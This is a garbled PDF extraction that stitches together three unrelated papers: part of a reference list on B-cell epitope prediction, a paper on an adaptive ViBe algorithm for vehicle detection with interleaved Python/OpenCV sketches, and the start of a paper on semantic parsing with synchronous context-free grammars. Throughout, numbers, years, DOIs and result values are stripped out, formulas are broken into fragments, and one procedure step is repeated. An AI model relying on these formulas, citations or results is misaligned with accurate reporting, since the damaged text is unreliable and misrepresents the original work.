in: the fourteenth joint conference on artificial intelligence. new york: acm, – . jespersen mc, peters b, nielsen m, marcatili p. . epitope prediction using confor- mational epitopes. nucleic acids research : – doi . /nar/gkx . kabsch w, sander c. . dictionary of protein secondary structure:pattern recog- nition of hydrogen-bonded and geometrical features. biopolymers : – doi . /bip. . kawashima s, pokarowski p, pokarowska m, kolinski a, katayama t, kanehisa m. . aaindex: amino acid index database, progress report . nucleic acids research ( ): – doi . /nar/gkm . kringelum jv, lundegaard c, lund o, nielsen m. . reliable b cell epitope predictions: impacts of method development and improved benchmarking. plos computational biology ( ):e doi . /journal.pcbi. . kringelum jv, nielsen m, padkjaer s, lund o. . structural analysis of b-cell epitopes in antibody: protein complexes. molecular immunology ( – ): – doi . /j.molimm. . . . kulkarni-kale u, bhosle s, kolaskar as. . cep : a conformational epitope prediction server. nucleic acids research (web server issue): – doi . /nar/gki . lee b, richards fm. . the interpretation of protein structures: estimation of static accessibility. journal of molecular biology : – doi . / - ( ) -x. li p, pok g, ksj a, shon hs, ryu kh. . qse: a new -d solvent exposure measure for the analysis of protein structure. proteomics : – doi . /pmic. . liang s, zheng d, zhang c, zacharias m. . consensus scoring. bmc bioinformatics ( ): – doi . / - - - . lin w, tsai c, hu y, jhang j. . clustering-based undersampling in class-imbalanced data. information sciences – : – doi . /j.ins. . . . liu x, wu j, zhou z. . exploratory undersampling for. ieee transaction on cybernetics ( ): – doi . /tsmcb. . . mihel j, Šiki m, tomi s, jeren b, vlahovi k. . psaia–protein structure and interaction analyzer. bmc structural biology : – doi . / - - - . millerl s, janin j, leskv am, chothial c, laboratories ci, physicochimique db. . interior and surface of monomeric proteins t. journal of molecular biology : – doi . / - ( ) - . murzin ag, brenner se, hubbard t, chothia c. . scop : a structural classification of proteins database for the investigation of sequences and structures. journal of molecular biology : – . nielsen m, lundegaard c, worning p. . improved prediction of mhc class i and class ii epitopes using a novel gibbs sampling approach. bioinformatics ( ): – doi . /bioinformatics/bth . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /nar/gkx http://dx.doi.org/ . /bip. http://dx.doi.org/ . /nar/gkm http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /j.molimm. . . http://dx.doi.org/ . /nar/gki http://dx.doi.org/ . / - ( ) -x http://dx.doi.org/ . /pmic. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /bioinformatics/bth http://dx.doi.org/ . /peerj-cs. nishikawa k, ooi t. . prediction of the surface-interior diagram of globular proteins by an empirical method.pdf. international journal of peptide and protein research : – . pintar a, carugo o, pongor s. . cx, an algorithm that identifies protruding atoms in proteins. bioinformatics ( ): – doi . /bioinformatics/ . . . ponomarenko j, bui h, li w, fusseder n, bourne pe, sette a, peters b. . ellipro : a new structure-based tool for the prediction of antibody epitopes. bmc bioinformat- ics ( ): – doi . / - - - . 
qi t, qiu t, zhang q, tang k, fan y, qiu j, wu d, zhang w, chen y, gao j, zhu r, cao z. . seppa . —more refined server to predict spatial epitope considering species of immune host and subcellular localization of protein antigen. nucleic acids research (may): – doi . /nar/gku . quinland jr. . c . programs for machine learning. san mateo: morgan kaufmann. raff e. . jsat: java statistical analysis tool, a library for machine learning. journal of machine learning research : – . raskutti b, kowalczyk a. . extreme re-balancing for svms: a case study. in: workshop on learning from imbalanced datasets ii. washington, d.c. ren j, liu q, ellis j, li j. . tertiary structure-based prediction of conformational b- cell epitopes through b factors. bioinformatics : – doi . /bioinformatics/btu . ren j, liu q, ellis j, li j. . positive-unlabeled learning for the prediction of confor- mational b-cell epitopes. bmc bioinformatics (suppl ): – . rost b, sender c. . conservation and prediction of solvent accesibility in pro- tein families. proteins structure, function genetics (november): – doi . /prot. . rubinstein nd, mayrose i, halperin d, yekutieli d, gershoni jm, pupko t. . computational characterization of b-cell epitopes. molecular immunology : – doi . /j.molimm. . . . rubinstein nd, mayrose i, pupko t. . a machine-learning approach for predicting b-cell epitopes. molecular immunology : – doi . /j.molimm. . . . shalev-shwartz s, singer y, srebro n. . pegasos: primal estimated sub-gradient solver for svm. in: international conference on machine learning (icml). new york. – . sowah ra, agebure ma, mills ga, koumadi km, fiawoo sy. . new cluster undersampling technique for class imbalance learning. international journal of machine learning and computing ( ): – doi . /ijmlc. . . . . sun j, wu d, xu t, wang x, xu x, tao l, li yx, cao zw. . seppa: a computa- tional server for spatial epitope prediction of protein antigens. nucleic acids research : – doi . /nar/gkp . sweredoski mj, baldi p. . pepito: improved discontinuous b-cell epitope pre- diction using multiple distance thresholds and half sphere exposure. bioinformatics ( ): – doi . /bioinformatics/btn . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /bioinformatics/btu http://dx.doi.org/ . /prot. http://dx.doi.org/ . /j.molimm. . . http://dx.doi.org/ . /j.molimm. . . http://dx.doi.org/ . /ijmlc. . . . http://dx.doi.org/ . /nar/gkp http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /peerj-cs. tien mz, meyer ag, sydykova dk, spielman sj, wilke co. . maximum allowed solvent accessibilites of residues in proteins. plos one ( ):e doi . /journal.pone. . tsai c, lin w, hu y, yao g. . under-sampling class imbalanced datasets by combining clustering analysis and instance selection. information sciences : – doi . /j.ins. . . . yen s, lee y. . expert systems with applications cluster-based under-sampling approaches for imbalanced data distributions. expert systems with applications : – doi . /j.eswa. . . . zhang j, zhao x, sun p, gao b, ma z. . conformational b-cell epitopes prediction from sequences using cost-sensitive ensemble classifiers and spatial clustering. biomed research international : – doi . / / . zhang w, xiong y, zhao m, zou h, ye x, liu j. . prediction of conformational b- cell epitopes from d structures by random forests with a distance-based feature. bmc bioinformatics ( ): – doi . 
/ - - - . zhao l, hoi sch, li z, wong l, nguyen h, li j. . coupling graphs, efficient algorithms and b-cell epitope prediction. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . zhao l, wong l, lu l, hoi sch, li j. . b-cell epitope prediction through a graph model. bmc bioinformatics ((sup )(s )): – . zheng w, ruan j, hu g, wang k, hanlon m, gao j. . analysis of conformational b-cell epitopes in the antibody-antigen complex using the depth function and the convex hull. plos one ( ): – doi . /journal.pone. . zhou c, chen z, zhang l, zhang l, yan d, mao t, tang k, qiu t, cao z. . seppa . —enhanced spatial epitope prediction enabling glycoprotein antigens. nucleic acids research (may): – doi . /nar/gkz . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/gkz http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on improved adaptive vibe algorithm for vehicle detection kun jiang school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com jianguo wang school of computer science and engineering xi'an technological university xi'an, china e-mail: wjg_xit@ .com abstract—vehicle detection is an important step in vehicle tracking and recognition in video environment. vibe algorithm is a moving target detection algorithm based on background difference method. based on the traditional vibe algorithm, this paper introduces three-frame difference method combined with vibe algorithm to speed up the elimination of ghosts, and proposes an adaptive vibe algorithm, which defines two kinds of vehicle detection errors and their corresponding error functions. then, according to the range of these two errors, a set of reasonable judgment methods are determined to adjust the unreasonable threshold, which ensures the adaptive updating of the background model. it improves the environmental adaptability of vehicle detection and ensures higher accuracy of vehicle detection under complex illumination conditions. keywords-vehicle detection; background difference method; vibe algorithm; three-frame difference algorithm i. introduction vehicle detection is the key step of video vehicle recognition, which aims to obtain the location of vehicle for further recognition. for each pixel, its background can usually be built using a model. at present, there are three methods for moving object detection: optical flow method[ ], frame difference method[ ], background subtraction method[ ]. based on the motion vector of pixels, the optical flow method can detect and track the target, but it has a large amount of computation and poor real-time performance. moreover, the method lacks sensitivity to noise, illumination change and background interference. frame difference method detects moving objects according to the difference between two or three consecutive frames. it has strong adaptability to the background change, but it does not perform well in detecting the contour of moving objects. in addition, it is very sensitive to the speed of moving objects, so it cannot effectively detect slow moving objects; background difference method is a commonly used moving object detection algorithm. 
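as a point of reference for the frame difference family just described, and for the three-frame difference that this paper later combines with vibe, a minimal sketch is given below; the binarization threshold is a placeholder rather than a value taken from the paper.

```python
# minimal three-frame difference sketch for moving-object masks (illustrative;
# the threshold value is a placeholder, not a parameter from the paper).
import numpy as np

def three_frame_difference(prev_frame, cur_frame, next_frame, thresh=25):
    """return a binary motion mask from three consecutive grayscale frames."""
    d1 = np.abs(cur_frame.astype(np.int16) - prev_frame.astype(np.int16))
    d2 = np.abs(next_frame.astype(np.int16) - cur_frame.astype(np.int16))
    # a pixel is marked as moving only if it changed in both frame pairs,
    # which suppresses the double image left by a simple two-frame difference
    return ((d1 > thresh) & (d2 > thresh)).astype(np.uint8)
```

the background difference method mentioned above, on which the rest of this paper builds, instead compares each frame against a maintained background model.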
the main idea is to make a distinction between each frame and background model to build the background model and get the moving foreground objects. background difference method has the ability to adapt to the scene changes in the video background, but if the background model contains foreground objects, it may generate ghosting. background difference method is one of the most widely used vehicle detection methods because of its fast and accurate. traditional background subtraction algorithms include gaussian mixture model (gmm)[ ] and codebook[ ]. gmm method is simple and low cost. however, the initialization time is too long and the algorithm is complex to meet the real-time requirements. cookbook has the advantages of dealing with time fluctuations well, but its memory consumption is quite high. in , olivier barnechand international journal of advanced network, monitoring and controls volume , no. , marc van droogenbroeck proposed the vibe algorithm [ ]. because the algorithm only needs the first frame to complete the model initialization, it can meet the real-time requirements compared with gmm model. in addition, in the process of execution, the algorithm only needs to record the corresponding sample set for each pixel, so it has smaller memory consumption. in addition, vibe algorithm has goodanti noise ability. although the foreground object can be mixed in pixel initialization, it will produce ghost phenomenon. in this paper, an improved adaptive algorithm of vibe is proposed, and a moving target detection method based on three frame difference method is introduced. through experimental verification, the algorithm proposed in this paper effectively solves the problems of "ghost" existing in traditional vib algorithm and insufficient adaptability to complex light environment. it has the advantages of simple algorithm, good real-time performance and high detection accuracy. ii. vibe background modeling the vibe background modeling algorithm was proposed by olivier barnech et al in .[ ] can be used for fast background extraction and moving object detection. vibe algorithm uses two mechanisms of random selection and neighborhood propagation to build and update the background model, which includes three steps: background modeling and initialization, foreground detection and background model update. in this paper, based on the traditional vibe algorithm, an adaptive background model of vibe is added. according to the range of vehicle detection error, a set of judgment method is determined to evaluate the rationality of the current threshold. when the threshold is not reasonable, adjust according to a certain step to ensure that the background model is updated automatically, and finally get more accurate vehicle detection results. initialization of background model x v represents the pixel value at point x, and each pixel builds the number of background sample sets n ( n ):  },,,{)( nvvvxm    as shown in fig. , the gray space makes the region centered on x, the radius of the gray space ))(( xvs r is r , and the threshold min# is set( min#  ). then find the intersection of )(xm and ))(( xvsr , c is the total number of elements in the intersection:   }},,{))(({)(# nr vvvxvsxmc    figure . vibe background model. the initialization of vibe model only needs the first image, but only one image does not contain the spatial information of pixels. according to the similar spatial characteristics of the close pixels, the sample set is filled with the approximate pixels. 
when the first image is input, the background model of the pixels in the image is as follows ( ):  )}(|{)( xnyyvxm g   international journal of advanced network, monitoring and controls volume , no. , where, )(xng represents the neighborhood pixel; v is the currently selected pixel. the probability that the pixels in )(xng are selected in n initialization is nn /) (  . a. foreground detection after initialization, vehicle detection starts from the second image. separating foreground target and background is the process of moving target detection. at time t , the pixel value of random pixel x is tv , according to formula ( ) c is judged according to formula ( ):        )background(min# )foreground(min# c c v t   t ( t ) is a preset threshold. when the number of times for the background is greater than the threshold min# , the pixel x are considered to belong to the background area; if not, it belongs to the foreground target area. according to formula ( ), the binary image obtained after vehicle detection is the initial vehicle detection binary image. b. dynamic update of background model in the process of updating the vibe background model, not only the relationship between the current pixel and its historical samples, but also the relationship between the current pixel and other pixels in other spatial neighborhood should be considered. in other words, the updating of vibe background model is a random process in both time and space. in the background model in the previous frame, if the current pixel tv is marked as background, its background model )(xm t is updated in time. if the current pixel is marked as vehicle, the model is not updated. this update strategy is called conservative update strategy. the method of updating the background model is to randomly select the sample m in the sample set )(xm t . the method to update the background model in space is to calculate the gradient amplitude of the current pixel tv , if the gradient amplitude is greater than , the space update is not implemented. otherwise, in the neighborhood of the current pixel t v , randomly select the pixel marked as tv , in the background model )(xm t of pixel tv randomly select a sample jm , and the characteristic value of the current pixel tv is assigned to jm . if the current pixel tv is at the edge of the image, it is randomly selected in its incomplete neighborhood. the spatial update strategy ensures the continuity of spatial information in the background image. iii. adaptive vibe background model in the vibe background model, threshold r represents the range of background eigenvalues (as shown in figure ). threshold r has a great influence on vehicle detection results. if the fixed threshold value is greater than the expected threshold value, it should be the vehicle's area, which will lead to inaccurate detection of the vehicle area. a. error functions of vehicle there are several situations of vehicle detection error: the detection background area is mistakenly international journal of advanced network, monitoring and controls volume , no. , regarded as the vehicle area, or the vehicle area is mistakenly regarded as the background area. the former belongs to the error vehicle area; the latter is the error background area. the size of these two types of error areas will change with the change of threshold r . 
when the threshold r is very small, the fluctuation range of the sample eigenvalues in the vibe background model is also very small, which helps to improve the detection accuracy of the vehicle area. the noise area may be mistakenly regarded as the wrong vehicle area, and the small noise area can be removed by morphological method, but the large noise area will not be easily removed. therefore, in order to prevent this situation, it is necessary to minimize the wrong vehicle area. in theory, the wrong vehicle area is part of the background and it is static. therefore, if the connected region does not overlap all the moving regions in the binary mapping of frame difference, the connected region is considered as the wrong vehicle region, and the error function of the wrong vehicle region can be defined as:  wl a rerr n i i     )(   where, i a is the ith connected domain, which does not overlap all moving regions in the binary mapping of frame difference, and n is the number of such connected domains. is the total area of the wrong vehicle area, l and w represent the length and width of the image respectively, and their units are pixels. the higher the resolution of the image, the more accurate the value of   n i i a . the wrong vehicle area function is defined as the ratio of the total area of the wrong vehicle area to the total area of the image. when the threshold value r is large, the fluctuation range of the sample eigenvalues in the vibe background model is also large, which is conducive to improving the detection accuracy of the background region. the second type of error area is to detect the area originally belonging to the vehicle as the background area [ ]. firstly, error background area error i a is defined, which represents the difference between the area of the smallest external rectangle containing the ith vehicle and the area of the same vehicle detected. is is the area of the smallest external rectangle containing the first vehicle, and iv is the area of the ith vehicle detected.  iii vsa    therefore, error background area error function can be further defined as:  )( n a rerr n i i     where n is the number of vehicles.   n i i a is the total area of the wrong vehicle area, take the average value to the error )( rerr of the wrong background area. from the above, the error )( rerr of the error background area and the error )( rerr of the error vehicle area are obtained. the total error of the error area can be defined as:  )()()( rerrrerrrerr    international journal of advanced network, monitoring and controls volume , no. , b. adaptive adjustment of threshold if the current threshold r is too small, the area of the area originally belonging to the background and mistakenly detected as the vehicle is too large, which means that the area )( rerr of the wrong vehicle area is relatively large. if the current threshold is too large, the area )( rerr of the area originally belonging to the vehicle and mistakenly detected as the background is too small, which means that the area of the wrong background is relatively large. according to this situation, we use the following adaptive scheme[ ]:          elserr trerrandtrerrifelsenrr trerrifnrr , )()(, )(,   t and t is the parameter to judge the rationality of threshold, and n is the adjustment step of threshold r . after a lot of experiments, the range of t is . to . ,the range of t is . to . , the range of n is to . 
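as a rough illustration of the two error functions and the threshold-adjustment rule above, the python fragment below gives one plausible reading of the (partly garbled) scheme; the function names and the convention of passing precomputed component areas are assumptions rather than the authors' implementation, and t1, t2, and the step n are left as parameters whose concrete ranges are those quoted in the text.

```python
def err_vehicle(false_vehicle_areas, img_w, img_h):
    """Err1(R): total area of connected components that overlap no moving
    region of the frame-difference mask, normalised by the image area L*W."""
    return sum(false_vehicle_areas) / float(img_w * img_h)

def err_background(bbox_areas, detected_areas):
    """Err2(R): mean difference between each vehicle's minimal bounding-box
    area S_i and its detected area V_i."""
    n = len(bbox_areas)
    return sum(s - v for s, v in zip(bbox_areas, detected_areas)) / float(n)

def adjust_threshold(r, err1, err2, t1, t2, step):
    """One adaptive step (a plausible reading of the scheme in the text):
    grow R when the false-vehicle error dominates, shrink it when the
    false-background error dominates, otherwise leave it unchanged."""
    if err1 > t1:
        return r + step
    elif err1 <= t1 and err2 > t2:
        return r - step
    return r
```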
a large number of experiments show that these values can ensure that the total error of the error background area and the error vehicle area proposed in this paper can be minimized. iv. improved adaptive vibe algorithm of three frame difference method this paper presents an improved adaptive vibe background modeling algorithm, which uses the vibe algorithm to model the background, adjusts the threshold adaptively, and then introduces the three frame difference method to improve. vibe background model algorithm is based on the first image to establish the background model[ ], but the traditional vibe algorithm will appear the phenomenon of "ghost". at present, many domestic and foreign literatures have carried out relevant research on the problem of "ghost". at present, the more commonly used method is to combine the traditional vibe algorithm with other algorithms, or to change the initialization of the first image of the original algorithm to a multi frame image initialization. the traditional vibe algorithm needs hundreds of frames to completely eliminate the "ghost" in the first frame. using the improved adaptive vibe background modeling algorithm, the speed of eliminating the "ghost" is accelerated, and the "ghost" can be eliminated within dozens of frames. at the same time, the proposed adaptive vibe algorithm greatly improves the traditional vibe background modeling algorithm for complex light environment detection. after the introduction of three frame difference method, the speed of eliminating "ghost" is obviously speeded up, and the problem of "hole" existing in the three frame difference method itself is solved. finally, the accuracy of moving object detection is improved by morphological processing of detection results. the flow chart of the improved vibe algorithm based on the three frame difference method is shown in figure , and the specific implementation steps are as follows: ) input video image, and carry out image pre-processing such as graying and binarization. ) background modeling of three frame difference method and background modeling of vibe algorithm are carried out respectively for the image preprocessed. the final image is the "and" of the image calculated by the two methods. ) background modeling of three frame difference method and background modeling of vibe algorithm are carried out respectively for the image preprocessed. the final image is the "and" of the image calculated by the two methods. ) through the adaptive threshold adjustment algorithm proposed in this paper, the appropriate threshold is calculated to update the current background. international journal of advanced network, monitoring and controls volume , no. , ) the updated image is processed by morphology to get the final detection results. figure . improved vibe algorithm of three frame difference method. v. experimental result based on the above theory and processing flow, the algorithm is tested in the following environment: operating system: microsoft windows , experimental platform: visual studio , cpu: intel , ram: g, third-party open source library: opencv . . . in order to verify that the method proposed in this paper can accurately detect moving objects in complex environment, the video selected in this experiment is the road monitoring video with more vehicles. this video is the traffic situation of a certain intersection at a certain time, with frames in total, and the frame size is * . 
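before turning to the results, the following is a minimal opencv-based sketch of the detection pipeline of section iv as applied in these experiments: the "and" fusion of the three-frame-difference mask with the vibe foreground mask, followed by morphological cleanup. the function names, the difference threshold, and the kernel size are illustrative assumptions; the authors' own implementation is not reproduced here.

```python
import cv2

def three_frame_diff(prev2, prev1, cur, thresh=25):
    """Binary motion mask from three consecutive grayscale frames."""
    d1 = cv2.absdiff(prev1, prev2)
    d2 = cv2.absdiff(cur, prev1)
    _, b1 = cv2.threshold(d1, thresh, 255, cv2.THRESH_BINARY)
    _, b2 = cv2.threshold(d2, thresh, 255, cv2.THRESH_BINARY)
    return cv2.bitwise_and(b1, b2)

def detect_vehicles(frames, vibe_masks):
    """Fuse the ViBe foreground mask with the three-frame-difference mask
    (the 'and' of the two results described in the flow above), then clean
    the result with morphological open/close."""
    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))
    results = []
    for i in range(2, len(frames)):
        motion = three_frame_diff(frames[i - 2], frames[i - 1], frames[i])
        fused = cv2.bitwise_and(motion, vibe_masks[i])
        fused = cv2.morphologyEx(fused, cv2.MORPH_OPEN, kernel)
        fused = cv2.morphologyEx(fused, cv2.MORPH_CLOSE, kernel)
        results.append(fused)
    return results
```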
an improved three frame difference algorithm based on vibe background modeling is used to detect moving vehicles. during the experiment, the th frame, frame and frame of video image sequence are randomly selected to analyze the detection effect. th frames th frames th frames (a) original video (b) original vibe algorithm (c) gaussian mixture model (d) three frame difference method (e) improved vibe algorithm figure . comparison between the algorithm in this paperand the traditional target detection algorithm. it can be seen from figure that the original vibe algorithm of frame has obvious ghost phenomenon and interference of complex lighting environment factors, and the effect of gaussian mixture model is good, but the calculation of gaussian mixture model is too complex to meet the real-time requirements of vehicle detection, the real-time performance of three frame difference method is good but the accuracy is not high enough, and there is an obvious "empty" phenomenon. in contrast, this algorithm effectively solves the ghost phenomenon and reduces the impact of complex environmental factors. international journal of advanced network, monitoring and controls volume , no. , table i. evaluation results of vehicle inspection gmm three frame difference original vibe improve d vibe recall . % . % . % . % precision . % . % . % . % f . % . % . % . % vi. conclusion in order to solve the ghost phenomenon in vibe algorithm and the problem of low detection accuracy in complex illumination environment, this paper first proposes an adaptive threshold vibe algorithm in order to update the background accurately under the condition of complex illumination change. by defining two kinds of vehicle detection error functions, according to the error range calculated by these two functions, an algorithm is used to determine the rationality of threshold. vehicle detection and background update are performed by using the adaptive algorithm. in order to solve the problem of ghost, three frame difference method and adaptive vibe algorithm are introduced. finally, the experimental results show that the improved adaptive vibe algorithm can effectively remove the "ghost" phenomenon and improve the accuracy of vehicle detection in complex lighting environment. figure shows the change of the number of ghost pixels with the number of frames. the x axis represents the number of frames, and the y axis represents the number of ghost pixels. it can be seen from the figure that the improved algorithm in this paper greatly accelerates the ghost elimination speed, which is significantly faster than the gaussian mixture algorithm and the vibe algorithm. figure . ghost elimination speed. references [ ] delpiano j, jara j, scheer j, et al. performance of optical flow techniques for motion analysis of fluorescent point signals in confocal microscopy. machine vision & applications, , ( ): - . [ ] j.-g. yan, w.-h xu. moving object real-time detection algorithm based on new frame difference. computer engineering & design, , ( ): - . [ ] yang w, zhang t. a new method for the detection of moving targets in complex scenes. journal of computer research & development, . [ ] kaewtrakulpong p, bowden r. an improved adaptive background mixture model for realtime tracking with shadow detection. springer us, . [ ] kim k, chalidabhongse t h, harwood d, et al. real-time foreground– background segmentation using codebook model. real-time imaging, , ( ): - . [ ] barnich o, van d m. 
vibe: a universal background subtraction algorithm for video sequences. ieee transactions on image processing a publication of the ieee signal processing society, , ( ): - . [ ] barnich o, van droogenbroeck m. vibe: a unrsal background subtraction algorithm for video sequences[j]. ieee transactions on image processing, , ( ): - . [ ] hu changhui, lu xiaobo, ye mengjun, zeng weili. singular value decomposition and local near neighbors for face recognition under varying illumination [j]. pattern recognition, , : - . [ ] z. qiming and m. chengqian, a vehicle detection method in tunnel video based on vibe algorithm, ieee nd advanced information technology, electronic and automation control conference (iaeac), chongqing, , pp. - . [ ] c. pan, z. zhu, l. jiang, m. wang and x. lu, "adaptive vibe background model for vehicle detection," ieee nd advanced information technology, electronic and automation control conference (iaeac), chongqing, , pp. - . [ ] ekpar f. a framework for intelligent video surveillance. proceedings of the ieee th international conference on computer and information technology workshops. sydney, qld, australia. . – . semantic parsing of ambiguous input through paraphrasing and verification philip arthur, graham neubig, sakriani sakti, tomoki toda, satoshi nakamura graduate school of information science, nara institute of science and technology, japan {philip.arthur.om , neubig, ssakti, tomoki, s-nakamura}@is.naist.jp abstract we propose a new method for semantic pars- ing of ambiguous and ungrammatical input, such as search queries. we do so by build- ing on an existing semantic parsing framework that uses synchronous context free grammars (scfg) to jointly model the input sentence and output meaning representation. we gener- alize this scfg framework to allow not one, but multiple outputs. using this formalism, we construct a grammar that takes an ambigu- ous input string and jointly maps it into both a meaning representation and a natural lan- guage paraphrase that is less ambiguous than the original input. this paraphrase can be used to disambiguate the meaning representa- tion via verification using a language model that calculates the probability of each para- phrase. introduction semantic parsing (sp) is the problem of parsing a given natural language (nl) sentence into a meaning representation (mr) conducive to further processing by applications. one of the major challenges in sp stems from the fact that nl is rife with ambiguities. for example, even the simple sentence “where can we eat a steak in kobe?” contains syntactic ambi- guities (“eat in kobe” or “steak in kobe”?), quan- tifier scope ambiguities (do we all eat one steak, or each eat one steak?), and word sense ambigui- ties (is kobe a city in japan; or an nba basketball tools to replicate our experiments can be found at http://isw .naist.jp/~philip-a/tacl /index.html. player?). previous works using statistical models along with formalisms such as combinatorial cat- egorial grammars, synchronous context free gram- mars, and dependency based compositional seman- tics have shown notable success in resolving these ambiguities (zettlemoyer and collins, ; wong and mooney, ; liang et al., ; kwiatkowski et al., ). 
much previous work on sp has focused on the case of answering natural language queries to a database of facts, where the queries generally take the form of full sentences such as “what is the height of kobe bryant?” while answering these ques- tions provides an excellent first step to natural lan- guage information access, in many cases the input is not a full sentence, but something more underspec- ified and ungrammatical. for example, this is the case for keyword-based search queries (sajjad et al., ) or short dialogue utterances (zettlemoyer and collins, ). specifically taking the example of search queries, users tend to omit some of the function words and grammatical constructs in the language to make a more concise query. the first column of table illustrates several search queries of the pattern “kobe x” where x is another word. from these queries and their mrs in column two, we can see that there are several kinds of ambiguity, including not only the distinction between kobe as city or a basketball player as in the previous example, but also more pernicious problems unique to the more ambiguous input. focusing on the queries “kobe hotels” and “kobe flight” we can see that it is also necessary to estimate the latent relationship between search query meaning representation paraphrase kobe hotel λx (hotel(x) ∧ in(x, kobe city)) hotel in kobe city kobe flight λx (flight(x) ∧ to(x, kobe city)) flight to kobe city kobe height height(kobe bryant) height of kobe bryant table : example of a search query, mr, and its paraphrase words, such as “location” or “destination.” however it should be noted that if we take the keyword query and re-express it as a more explicit paraphrase, we can reduce this ambiguity to the point where there is only one reasonable interpretation. for example, in the second line, if we add the preposition “to” the user is likely asking for flights that arriving in kobe, and if we add “from” the user is asking for depar- tures. in this paper, we focus on sp of ambiguous input and propose a new method for dealing with the prob- lem of ambiguity. here we propose a framework where an ambiguous input (column in table ) is simultaneously transformed into both its mr (col- umn ) and a more explicit, less ambiguous para- phrase (column ). the advantage of this method is that it is then possible to verify that the paraphrase indeed expresses the intended meaning of the under- specified input. this verification can be done either manually by the system user or automatically using a probabilistic model trained to judge the naturalness of the paraphrases. as a concrete approach, building upon the formal- ism of synchronous context free grammars (scfg). unlike traditional scfgs, which usually only gen- erate one target string (in semantic parsing, an mr), we introduce a new variety of scfgs that generate multiple strings on the target side. this allows us to not only generate the mr, but also jointly gen- erate the more explicit paraphrase. we then use a language model over the paraphrases generated by each derivation to help determine which derivations, and consequently which mrs, are more likely. we perform an evaluation using the standard geo- query benchmark of query-logic pairs. first we note that baseline scfg parser achieves reasonable accuracy on regular questions but when the same method is used with underspecified input, the system accuracy decreases significantly. 
on the other hand, when incorporating the proposed tri-synchronous grammar to generate paraphrases and verify them with a language model, we find that it is possible to recover the loss of accuracy, resulting in a model that is able to parse the ambiguous input with signif- icantly better accuracy. semantic parsing using context free grammars as a baseline sp formalism, we follow wong and mooney ( ) in casting sp as a problem of trans- lation from a natural language query into its mr. this translation is done using synchronous context free grammars, which we describe in detail in the following sections. . synchronous context free grammars synchronous context free grammars are a general- ization of context-free grammars (cfgs) that gener- ate pairs of related strings instead of single strings. slightly modifying the notation of chiang ( ), we can formalize scfg rules as: x → ⟨γs, γt⟩ ( ) where x is a non-terminal and γs and γt are strings of terminals and indexed non-terminals on the source and target side of the grammar. scfgs have recently come into favor as a tool for statistical machine translation (smt). in smt, a synchronous rule could, for example, take the form of: x → ⟨x eats x , x wa x wo taberu⟩ ( ) where γs is an english string and γt is a japanese string. each non-terminal on the right side is in- dexed, with non-terminals with identical indices cor- responding to each-other. given the scfg grammar, we can additionally as- sign a score to each rule, where higher scored rules are more likely to participate in a derivation. given the grammar of scored rules, and an input sentence grammar r query → ⟨give me the conj , answer(x , conj )⟩ r conj → ⟨form form state , (form , form , const(x , stateid(state ))⟩ r form → ⟨cities, city(x )⟩ r form → ⟨in, loc(x , x )⟩ r state → ⟨virginia, virginia⟩ derivations ⟨query , query ⟩ r ⇒ ⟨give me the conj , answer(x , conj ))⟩ r ⇒ ⟨give me the form form state , answer(x , (form , form , const(x , stateid(state ))))⟩ r ⇒ ⟨give me the cities form state , answer(x , (city(x ), form , const(x , stateid(state )))⟩ r ⇒ ⟨give me the cities in state , answer(x , (city(x ), loc(x ,x ), const(x , stateid(state )))⟩ r ⇒ ⟨give me the cities in virginia, answer(x , (city(x ), loc(x , x ), const(x , stateid(virginia)))⟩ figure : example of sp using scfgs. the left hand and right hand sides are generated simultaneously. s, the highest scoring parse and output sentence t can be calculated using the cky+ algorithm (chi- ang, ). . semantic parsing with scfgs in the simplest form of sp with scfgs, γs is used to construct a natural language string s and γt is used to construct the mr t (wong and mooney, ). figure shows an example of using an scfg to si- multaneously generate a natural language string and its mr. in this picture, the bold symbols are non- terminals which can be substituted with other non- terminal productions. productions end when all the tokens are terminals. the collection of rules used to generate a particular ⟨s,t ⟩ pair is a derivation d= d , d , ..., d|d|. wong and mooney ( ) further extended this formalism to handle λ-scfgs, which treat γs as the natural language query and γt as an mr based on λ calculus. scfg rules are automatically learned from pairs of sentences with input text and the corre- sponding mr, where the mr is expressed as a parse tree whose internal nodes are predicates, operators, or quantifiers. in this paper, we follow li et al. ( )’s approach to extract a grammar from this parallel data. 
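as a toy illustration of how synchronous rules rewrite the natural-language side and the mr side in lockstep (in the spirit of the derivation example in the figure above), the sketch below uses a deliberately simplified rule inventory and plain string substitution; it is not the λ-scfg machinery, variable handling, or decoder used in the paper, and the rule set and nonterminal names are invented for the example.

```python
# Toy synchronous grammar: each rule rewrites one nonterminal on both the
# natural-language side and the MR side at the same time.
RULES = {
    "QUERY": [("give me the CONJ", "answer(x, CONJ)")],
    "CONJ":  [("FORM PREP STATE", "(FORM, PREP, const(x, stateid(STATE)))")],
    "FORM":  [("cities", "city(x)")],
    "PREP":  [("in", "loc(x, y)")],
    "STATE": [("virginia", "virginia")],
}

def derive(nl, mr, rules):
    """Expand nonterminals until both sides are fully lexicalised."""
    for nt, productions in rules.items():
        while nt in nl.split() or nt in mr:
            src, tgt = productions[0]  # always take the first production
            nl = nl.replace(nt, src, 1)
            mr = mr.replace(nt, tgt, 1)
    return nl, mr

print(derive("QUERY", "QUERY", RULES))
# ('give me the cities in virginia',
#  'answer(x, (city(x), loc(x, y), const(x, stateid(virginia))))')
```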
